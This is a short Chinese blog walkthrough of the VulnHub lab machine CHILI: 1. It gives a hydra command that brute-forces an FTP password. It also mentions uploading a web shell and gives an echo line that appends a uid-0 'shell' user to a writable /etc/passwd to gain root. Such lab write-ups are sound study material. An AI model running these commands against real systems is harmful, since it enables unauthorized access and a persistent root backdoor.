VulnHub靶场之CHILI: 1

VulnHub靶场之CHILI: 1

扫描IP以及端口:
在这里插入图片描述
访问80端口,一个小辣椒,目录扫描,啥都没有,只能从ftp下手了:
在这里插入图片描述
看了看hint,用chili当作用户名试试破解一下密码:
在这里插入图片描述
利用hydra破解ftp密码:

hydra -l chili -P /usr/share/wordlists/rockyou.txt -f -V ftp://192.168.198.150

得到密码:
在这里插入图片描述

成功进入:
在这里插入图片描述
进入到/var/www/html下,.nano下可读可写:
在这里插入图片描述
上传shell文件,别忘了加权限chmod 777:
在这里插入图片描述
访问,监听:
在这里插入图片描述
就一个用户chili,,,内核也较新:
在这里插入图片描述
发现passwd可以写入:
在这里插入图片描述
直接利用kali的工具openssl:

openssl passwd -1 -salt shell 123

在这里插入图片描述
写入到passwd:

echo 'shell:$1$shell$5TvJA7y/9faSDWR84IKgZ/:0:0::/root:/bin/bash'>>/etc/passwd

在这里插入图片描述
成功获取root权限,读取flag:
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_42967398/article/details/108928297